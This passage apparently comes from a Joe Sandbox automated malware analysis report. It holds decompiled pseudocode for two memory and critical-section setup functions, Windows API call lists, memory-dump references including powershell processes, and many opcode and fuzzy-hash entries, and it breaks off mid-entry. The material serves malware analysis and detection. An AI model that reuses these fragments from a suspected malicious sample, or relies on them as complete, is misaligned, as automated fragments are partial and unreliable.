                              • Opcode ID: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
                              • Instruction ID: 682fdee239e6c4724d42c8af7adc4720fc3e2d38c4520a7b7ac2604701000241
                              • Opcode Fuzzy Hash: 65d677eaf710bde40107d5e97ee8b2feebca7ae19d827cde6303db2279eeba92
                              • Instruction Fuzzy Hash: 6C1126B1D011199ACB06EFA5C9959EEBBB4FF18304F50447EE445B3291DB7A5E00CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004160FA() {
                              				signed int _t15;
                              				void* _t17;
                              				void* _t19;
                              				void* _t25;
                              				signed int _t26;
                              				void* _t27;
                              				intOrPtr* _t29;
                              
                              				_t15 =  *0x425a28; // 0x0
                              				_t26 =  *0x425a18; // 0x0
                              				if(_t15 != _t26) {
                              					L3:
                              					_t27 =  *0x425a2c; // 0x0
                              					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
                              					_t17 = HeapAlloc( *0x425a34, 8, 0x41c4);
                              					 *(_t29 + 0x10) = _t17;
                              					if(_t17 == 0) {
                              						L6:
                              						return 0;
                              					}
                              					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
                              					 *(_t29 + 0xc) = _t19;
                              					if(_t19 != 0) {
                              						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
                              						 *_t29 = 0;
                              						 *((intOrPtr*)(_t29 + 4)) = 0;
                              						 *0x425a28 =  *0x425a28 + 1;
                              						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
                              						return _t29;
                              					}
                              					HeapFree( *0x425a34, 0,  *(_t29 + 0x10));
                              					goto L6;
                              				}
                              				_t2 = _t26 * 4; // 0x50
                              				_t25 = HeapReAlloc( *0x425a34, 0,  *0x425a2c, _t26 + _t2 + 0x50 << 2);
                              				if(_t25 == 0) {
                              					goto L6;
                              				}
                              				 *0x425a18 =  *0x425a18 + 0x10;
                              				 *0x425a2c = _t25;
                              				_t15 =  *0x425a28; // 0x0
                              				goto L3;
                              			}

                              Instruction addresses: 0x004160fa to 0x004161a6

                              APIs
                              • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416122
                              • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00415EC2,00000000,00000000,00000000,00413EF1,00000000,00000000,?,00000000,00000000,00000000), ref: 00416156
                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 00416170
                              • HeapFree.KERNEL32(00000000,?), ref: 00416187
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: AllocHeap$FreeVirtual
                              • String ID:
                              • API String ID: 3499195154-0
                              • Opcode ID: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
                              • Instruction ID: c92a38fae87bb937ac208a7a453d8678043178d73965b4d0b203d58dccefea2c
                              • Opcode Fuzzy Hash: b9288557613d4b1507cb107ac5399481b8ee784b68c3247b56fc213fdecf1f33
                              • Instruction Fuzzy Hash: 98112B31300B01BFC7318F29EC869567BB5FB49764791862AF151C65B0C7709842CF48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004156E1(void* __eax) {
                              				void* _t1;
                              
                              				_t1 = __eax;
                              				InitializeCriticalSection( *0x42078c);
                              				InitializeCriticalSection( *0x42077c);
                              				InitializeCriticalSection( *0x42076c);
                              				InitializeCriticalSection( *0x42074c);
                              				return _t1;
                              			}

                              Instruction addresses: 0x004156e1 to 0x00415709

                              APIs
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156EE
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156F6
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 004156FE
                              • InitializeCriticalSection.KERNEL32(?,004154C2,?,00414B74), ref: 00415706
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalInitializeSection
                              • String ID:
                              • API String ID: 32694325-0
                              • Opcode ID: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
                              • Instruction ID: 9a5a21d657ffcc76f5c3c67f011d6e28d8344b300781f1748fbef07cd2b7b2eb
                              • Opcode Fuzzy Hash: 9da826fcb73db9b2f0886f92194b085cad0f2cdeae026ac3c84f39be76329a94
                              • Instruction Fuzzy Hash: CCC00231A05138ABCB712B65FC048563FB5EB882A03558077A1045203186612C12EFD8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000011.00000002.424469620.00007FF8163B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7ff8163b0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bcbd1499737b02a10790536d659e8440da92eb0421aa6ceb59252d710f3e0ca3
                              • Instruction ID: 9541ed6a97d5b03d13cf7dcc3ddfbe9e6c507bb32b4893cf002164c7c607d78f
                              • Opcode Fuzzy Hash: bcbd1499737b02a10790536d659e8440da92eb0421aa6ceb59252d710f3e0ca3
                              • Instruction Fuzzy Hash: 7751063191CE494FD345DB18E854BA6BBE1FFC5361F1847BAE08DC72A2CE28A945C781
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000011.00000002.424469620.00007FF8163B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8163B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_7ff8163b0000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: abfb08509ba2ad3dcb560ce6df667010d1f52f3db04242593f4bff19157a36dc
                              • Instruction ID: 116f08d056536bd5b228816cd2fd0e0eea4df47e38520604a18b199e38f694b9
                              • Opcode Fuzzy Hash: abfb08509ba2ad3dcb560ce6df667010d1f52f3db04242593f4bff19157a36dc
                              • Instruction Fuzzy Hash: 5601677111CB0C4FD744EF0CE451AA6B7E0FB95364F10056EE58AC7691DA36E881CB45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:4.1%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:4
                              Total number of Limit Nodes:1

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1ebf16b34079cb44d62b2c9a8e72141265e065cc82d6d7994492eb161fc5622a
                              • Instruction ID: 27749964efb38fa7094813b1c28a553498df1ac5af336036751571dd9e6be900
                              • Opcode Fuzzy Hash: 1ebf16b34079cb44d62b2c9a8e72141265e065cc82d6d7994492eb161fc5622a
                              • Instruction Fuzzy Hash: EE524A34A00209CFDB64DF24C950BAE73B2EF89384F1185A9D91AAF294DB35DD45CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 03C1C382
                              Memory Dump Source
                              • Source File: 00000018.00000002.431031970.0000000003C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_3c10000_powershell.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 531d045e3a2906ca296c9188816a3b3ca07b9f08b6d0580e93bc941d654f32e0
                              • Instruction ID: aa21ebcaba2030fb0af368dad3a0e3e1af155af2c67ded5e452544b6f329c89e
                              • Opcode Fuzzy Hash: 531d045e3a2906ca296c9188816a3b3ca07b9f08b6d0580e93bc941d654f32e0
                              • Instruction Fuzzy Hash: 2D419B71A002599FCB15CFA9C854AEEFBB5AF49314F188169E804FB750CB349A14DBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,?,?,?,?,?), ref: 03C1C382
                              Memory Dump Source
                              • Source File: 00000018.00000002.431031970.0000000003C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_3c10000_powershell.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 2b526d051a923ae6d9ebc33dfe12b2d2c1dd5293f74b328a3d0c1ab91d61c8ec
                              • Instruction ID: df39e608cf091e7ad87a21b8db65eaaf26dae5335157712ebe080b58935ce24f
                              • Opcode Fuzzy Hash: 2b526d051a923ae6d9ebc33dfe12b2d2c1dd5293f74b328a3d0c1ab91d61c8ec
                              • Instruction Fuzzy Hash: 6B31AB71A002999FCB01CFA9D890ADEBFB5FF49314F04815AE815EB751C7349A18CBE2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000018.00000002.431031970.0000000003C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 03C10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_3c10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8f29276a25f3da4eb3d6f771a559323b6e8f5be360d2e7e28991170ce9778c8b
                              • Instruction ID: 9ca186cf5420741aca3ee84ca62e4b1d718b485ff7323bdd374a0cc7803e338a
                              • Opcode Fuzzy Hash: 8f29276a25f3da4eb3d6f771a559323b6e8f5be360d2e7e28991170ce9778c8b
                              • Instruction Fuzzy Hash: DE11D0B2840255EFDF01CF94C8846DEBBB0FB5A314F488189E819DB610C335D665EBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Strings
                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0
                              • API String ID: 0-4108050209
                              • Opcode ID: 5ddd4730ac39b0cea2abe7dd1562f8fd74d2775777f675b56d325b67ed599821
                              • Instruction ID: 564b39f26babee19485f94be5635ec03cd14f0703b7cb60c3ae879e276bc352f
                              • Opcode Fuzzy Hash: 5ddd4730ac39b0cea2abe7dd1562f8fd74d2775777f675b56d325b67ed599821
                              • Instruction Fuzzy Hash: 2151F170A053489FDB10DBA5D854BEFBBF9EF49354F104469D406AB340DB39980ACBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3c490990a92974b4da12a4b50f5184eac804dacee9db31946312d1e9e805ebe7
                              • Instruction ID: 7afc641691b395a0aa753f91fc227c75bf74ec15725d9b825a880c35e17add7e
                              • Opcode Fuzzy Hash: 3c490990a92974b4da12a4b50f5184eac804dacee9db31946312d1e9e805ebe7
                              • Instruction Fuzzy Hash: E472C4747002049FDB94EF76D8506BE7BA6EF85208B14846DE806DF391EF75DC068BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c8d2749b00c0dfd3f63ef1e97c5e0b6a59d3d77109238ead71c23ef463b8a2da
                              • Instruction ID: 6eef81405d5f9ba632ba1ad1b68dfd9d2fc98760622aac2f3553789242900954
                              • Opcode Fuzzy Hash: c8d2749b00c0dfd3f63ef1e97c5e0b6a59d3d77109238ead71c23ef463b8a2da
                              • Instruction Fuzzy Hash: C1D1B134B002099FC754DF69C854AEEB7F2FF89214F148569E816AB790DB34EC46CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2378103fb0214866eda863eece91d9ff51b0905afe95bca6550c884dc82fd14e
                              • Instruction ID: 8d7f8c9aed490835a6843f6b1d60c9b969146505304ae18ae8c93a2d0a3ee290
                              • Opcode Fuzzy Hash: 2378103fb0214866eda863eece91d9ff51b0905afe95bca6550c884dc82fd14e
                              • Instruction Fuzzy Hash: 3CC1C035A01219DFCB60DF65C880AE9B7B2EF85704B048929E849DF765DB30ED59CBD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b893361aa93dba8db28a9a3c72fd1c80b57f9fb862eca3714739286d210c27f9
                              • Instruction ID: 5be2899f028699453c72450889155c52e96e66068be6bd0bbda6c88dcbb11939
                              • Opcode Fuzzy Hash: b893361aa93dba8db28a9a3c72fd1c80b57f9fb862eca3714739286d210c27f9
                              • Instruction Fuzzy Hash: C9A1CF317003489FCB14DB79D8546EFB7B6EB84209F14846EE8069BB95DB749C0ACBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bee52e7f65945c20d7b6d13207c44d4173336d381c4bd1708742ba9876f7ba6f
                              • Instruction ID: 279e8958059250101e0ba450767734617790036377d843b11b91cb9bcca5742b
                              • Opcode Fuzzy Hash: bee52e7f65945c20d7b6d13207c44d4173336d381c4bd1708742ba9876f7ba6f
                              • Instruction Fuzzy Hash: C181BE397002149FC744EB79D850AAEFBA7EFC8255B14C06AE90ACB754DF349C4587A2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f1cd3aa5cefc0298ef34f3f492744d0f7d467f2782ba7a6eb569a5b755041e44
                              • Instruction ID: 93d3f21ee79d4724d5bac9e35268c04becd3fae084973309c72bcb0f1a846619
                              • Opcode Fuzzy Hash: f1cd3aa5cefc0298ef34f3f492744d0f7d467f2782ba7a6eb569a5b755041e44
                              • Instruction Fuzzy Hash: C481D0357002059FCB14AF66D4546FE77A6EF84249F04896DE806CF794DB78EC0A8BE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 31a1709d2509add010ca7e2e317d03226d7600b573622c1a2ad0ce6d46b0f2e0
                              • Instruction ID: 9c6696c45c0d6d982493e03297bda6e97f5cd6acf9b545accf721306581b001b
                              • Opcode Fuzzy Hash: 31a1709d2509add010ca7e2e317d03226d7600b573622c1a2ad0ce6d46b0f2e0
                              • Instruction Fuzzy Hash: 23918474A002489FCB04DFA5C850AEEBBF6EF89304F14812AE815EB751DB349D56CFA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph (rendered graph of function 6768b30 not reproduced in this extract)
                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c775f30732d61a01ecd32c8638271c46fa25382ab087e14073cba02e3cd9e7f1
                              • Instruction ID: d419dbc0a4d72255c635fa260899b2c0db865e7657d4bd2fda201f88d91df9b2
                              • Opcode Fuzzy Hash: c775f30732d61a01ecd32c8638271c46fa25382ab087e14073cba02e3cd9e7f1
                              • Instruction Fuzzy Hash: DC81BD35A012049FDB54DF69D890BEE77E2EF89304F10856AE8169F390DB74EC45CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: efc1094eb9369e28730009b59912a1fbca6f580d4a81784525aa93e8511e19a9
                              • Instruction ID: 2bfab6eb084496827359892d5ea69925bafd3bd0c8ad942920dcdc2d516492a4
                              • Opcode Fuzzy Hash: efc1094eb9369e28730009b59912a1fbca6f580d4a81784525aa93e8511e19a9
                              • Instruction Fuzzy Hash: 62510F34B002099FCB15DF69D810AFFBBB6AF85204B14816AE915DB341DF358D06CBA2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 99a5cc952a686db2da196335c113244cc5b07a2bc01f53c8f9e9ddf8d8d3dfa8
                              • Instruction ID: 08874f3d3b664106addbd177f9bb615f9d029ba6e5f4708ab4b699db01a533ab
                              • Opcode Fuzzy Hash: 99a5cc952a686db2da196335c113244cc5b07a2bc01f53c8f9e9ddf8d8d3dfa8
                              • Instruction Fuzzy Hash: AD511631E043488FCB19CFB5C8145FEBBB6AF85254F14826AE811EB381DB748D06CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d4a6bd0fab03dfaca5f25899141a13b2ac3ce7a3ca0f51a32ebda0038d7f786a
                              • Instruction ID: bad7d689510ae3e009382f8ea7f6a377fd4049eb3479fd985f435f92613df3ea
                              • Opcode Fuzzy Hash: d4a6bd0fab03dfaca5f25899141a13b2ac3ce7a3ca0f51a32ebda0038d7f786a
                              • Instruction Fuzzy Hash: 1851D434B012189FCB05DBA4DC50BEFBBB7EB88304F108029D506A77A4DF399C469B95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2b4e18634202cd7c1a78e10f7c8cc1690c9f91b79bcd4c55b3a50b3a38e906f
                              • Instruction ID: 647365de9d61cc32113b4fe1b0370f1d119c771f75d22fedd2a41acd6a1860e9
                              • Opcode Fuzzy Hash: b2b4e18634202cd7c1a78e10f7c8cc1690c9f91b79bcd4c55b3a50b3a38e906f
                              • Instruction Fuzzy Hash: 5051AC35B10209DFDB68DF65C454AAEBBB2EF84304F14852EE816AB750DB30AC46CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 553d34c5c99d233f935c7b8f7a1f0959c7fd7b78a436a2ed885d937fb5200873
                              • Instruction ID: edab8b2e4c0a9f932151f3707498d5b1802de305a9615ee9a94d4eadd4810518
                              • Opcode Fuzzy Hash: 553d34c5c99d233f935c7b8f7a1f0959c7fd7b78a436a2ed885d937fb5200873
                              • Instruction Fuzzy Hash: 0B713735A01214CFEB24EF65D854FAAB7B6FF88310F1481A9D909EB294DB349D41DFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.439335533.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6f10000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d0f8513dccfa2574457ccb5281417e929906db387fbd17e3be58cce1804b3f5a
                              • Instruction ID: 68a9c4aaa248366009392b1f36f1096401b721ce174c31079fe4fe4423cc72b9
                              • Opcode Fuzzy Hash: d0f8513dccfa2574457ccb5281417e929906db387fbd17e3be58cce1804b3f5a
                              • Instruction Fuzzy Hash: C9519134B002189FDB05DBA5DC50BEFBBA7EB88704F108029E506A7794DF399C469B95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0c70ece639bc9368b2feda5171b4e7292b2d2dacc0e2573a7f9aa16a69eb8a5f
                              • Instruction ID: 3ab86c406d3aa224f9e0f020cf0a6558401181687c8573d527dcf321abbbcc2c
                              • Opcode Fuzzy Hash: 0c70ece639bc9368b2feda5171b4e7292b2d2dacc0e2573a7f9aa16a69eb8a5f
                              • Instruction Fuzzy Hash: DA517A34F20209DFDB68DF66C454AAEB7B2EF88300F148529E816AB350DB70AD41CF81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 645a6c2b485ff9adad2ec8c4f3ba58b7d20202ab85ddb5bdafe8dbe4b8bc9464
                              • Instruction ID: 4f8b3c5f082962081007019906848e51933d433179deb1bfb03b492a628b8b22
                              • Opcode Fuzzy Hash: 645a6c2b485ff9adad2ec8c4f3ba58b7d20202ab85ddb5bdafe8dbe4b8bc9464
                              • Instruction Fuzzy Hash: F5515C74E002089FDB14DFA9C950BEEBBB2EF89344F148129E815AB355DB74AD46CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9a1703dd2e414368e2c19e642228bd04518901a7219aa5018f9dc7d6968481d7
                              • Instruction ID: af8445fd7bdbbbbc585c733b8b0fbd5ab5c9fd95bfe13a371ecf070c3d501137
                              • Opcode Fuzzy Hash: 9a1703dd2e414368e2c19e642228bd04518901a7219aa5018f9dc7d6968481d7
                              • Instruction Fuzzy Hash: 3F41D0387043019FC718AB7AC8189AEBBB6EF85201B04446EE906CB7A1DB34DC05CBE1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5cef2c04cdad97b19506f3673e3df0d115a40925da965806733842bda5a1df1f
                              • Instruction ID: 10091788d3a5e2f5fba0372f5abcdd58d609510e6a5bdb1ff0f5ccee5e8f9382
                              • Opcode Fuzzy Hash: 5cef2c04cdad97b19506f3673e3df0d115a40925da965806733842bda5a1df1f
                              • Instruction Fuzzy Hash: A441AE35B052058FCB05EB75C5186ED7BF2EF89205F0544ADE802EB795DB389D09CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 836530c68bdeeb9a3de54a271001b03d96395d2d86c2805d40ef36ed04e46a51
                              • Instruction ID: c4e6d4de1bc5687535b43f1373defd3991706acc02db533e2c5d2a65890772c3
                              • Opcode Fuzzy Hash: 836530c68bdeeb9a3de54a271001b03d96395d2d86c2805d40ef36ed04e46a51
                              • Instruction Fuzzy Hash: 74416671E00249DFCB55CFA5C480A9EBBB2FF88304F14C969E809AB714DB70A949CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: db0cf3affba232b1b4a02619c4c19d8d6e33d318e052e6f95cb99e3c4bd4fa38
                              • Instruction ID: 1d3dc1f66e5a4726de0d351d1193769e5e3a38fa244c92595853f59516ae5d40
                              • Opcode Fuzzy Hash: db0cf3affba232b1b4a02619c4c19d8d6e33d318e052e6f95cb99e3c4bd4fa38
                              • Instruction Fuzzy Hash: 78414D34F20209DFDB68DF62D454AAEB7B2EF84345F108029ED01AB250DB71AC42CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000018.00000002.438173518.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_24_2_6760000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
